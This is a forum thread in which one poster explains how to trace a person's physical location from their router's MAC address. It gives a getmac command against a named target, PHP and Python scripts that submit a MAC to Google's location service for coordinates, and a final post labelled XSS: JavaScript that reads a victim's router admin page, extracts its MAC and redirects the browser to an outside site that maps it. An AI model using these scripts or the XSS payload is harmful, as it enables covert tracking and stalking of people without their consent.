PC & IT SUPPORT MADE EASY FORUM
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Using MAC ADDRESS To Find Actual Location

Go down

Using MAC ADDRESS To Find Actual Location Empty Using MAC ADDRESS To Find Actual Location

Post by jamied_uk 18th November 2015, 20:11

Trace Location Using MAC Address Of Your Router

http://windowstipoftheday.blogspot.co.uk/2006/02/finding-mac-address-of-remote-computer.html
http://samy.pl/androidmap/
https://code.google.com/p/o2platform/downloads/list
http://www.ciscozine.com/how-to-trace-mac-address/
https://youtu.be/vJtmZZGcR54
https://www.youtube.com/watch?v=IgX6Ij_GXf4
https://youtu.be/G_XfZ99ZKCc

https://stackoverflow.com/questions/4643405/geolocating-802-11-access-points-by-mac-address-using-google-geolocation-api

http://rumyittips.com/how-to-track-any-mac-address-geographical-location/
https://www.youtube.com/watch?v=LeXUKs3FrgM

viper is target name

getmac /s viper

If your not on a domain

getmac /s /u /p

Web Based Code for PHP
Code:


<?php

$mac = $_SERVER['argv'][1];


$postData = '{
    "version": "1.1.0",
    "wifi_towers": [{
        "mac_address": "' . $mac . '",
        "ssid": "0",
        "signal_strength":-72
    }]
}';

$opts = array(
  'http'=>array(
    'method' => "POST",
    'header'  => 'Content-type: application/x-www-form-urlencoded',
    'content' => $postData
  )
);


$response = file_get_contents(
    'http://www.google.com/loc/json',
    false,
    stream_context_create($opts)
);

$loc = json_decode($response, true);

echo $loc['location']['latitude'];
echo ',';
echo $loc['location']['longitude'];
?>



More Info

http://www.cnet.com/news/exclusive-googles-web-mapping-can-track-your-phone


Last edited by jamied_uk on 18th November 2015, 20:51; edited 3 times in total
jamied_uk
jamied_uk
Admin

Posts : 2951
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

Using MAC ADDRESS To Find Actual Location Empty Re: Using MAC ADDRESS To Find Actual Location

Post by jamied_uk 18th November 2015, 20:17

Get your own external IP

Code:
alias getmyip='dig +short myip.opendns.com @resolver1.opendns.com'

now type getmyip
jamied_uk
jamied_uk
Admin

Posts : 2951
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

Using MAC ADDRESS To Find Actual Location Empty Re: Using MAC ADDRESS To Find Actual Location

Post by jamied_uk 18th November 2015, 20:52



Last edited by jamied_uk on 18th November 2015, 20:57; edited 1 time in total
jamied_uk
jamied_uk
Admin

Posts : 2951
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

Using MAC ADDRESS To Find Actual Location Empty Re: Using MAC ADDRESS To Find Actual Location

Post by jamied_uk 18th November 2015, 20:56

Using Googles Map API

Code:
import urllib2
import simplejson

def locate(mac, ssid):
    url = "http://www.google.com/loc/json"
    ap = {"mac_address":mac, "ssid":ssid, "signal_strength":-81}
    aps = [ap]
    data = {
        'version': '1.1.0',
        'host': 'www.google.com',
        'request_address': True,
        'wifi_towers': aps,
    }

    jdata = simplejson.dumps(data)
    resp = urllib2.urlopen(url, jdata).read()
    return simplejson.loads(resp)
jamied_uk
jamied_uk
Admin

Posts : 2951
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

Using MAC ADDRESS To Find Actual Location Empty Re: Using MAC ADDRESS To Find Actual Location

Post by jamied_uk 18th November 2015, 20:57

XSS


Code:
var xmlhttp =  new XMLHttpRequest();
xmlhttp.open('GET', '/index.cgi?active%5fpage=9124&req%5fmode=0&mimic%5fbutton%5ffield=goto%3a+9124%2e%2e&button%5fvalue=9124', true);
xmlhttp.onreadystatechange = function() {
if (xmlhttp.readyState == 4 && xmlhttp.status == 200)
{
    var mac = xmlhttp.responseText.substr(xmlhttp.responseText.indexOf('00:21:63'), 17);
    mac = mac.replace(/:/g, '-');
    document.location = 'http://samy.pl/mapxss/fiosmap.php?mac=' + mac;
}
}
xmlhttp.send();
jamied_uk
jamied_uk
Admin

Posts : 2951
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

Using MAC ADDRESS To Find Actual Location Empty Re: Using MAC ADDRESS To Find Actual Location

Post by Sponsored content


Sponsored content


Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum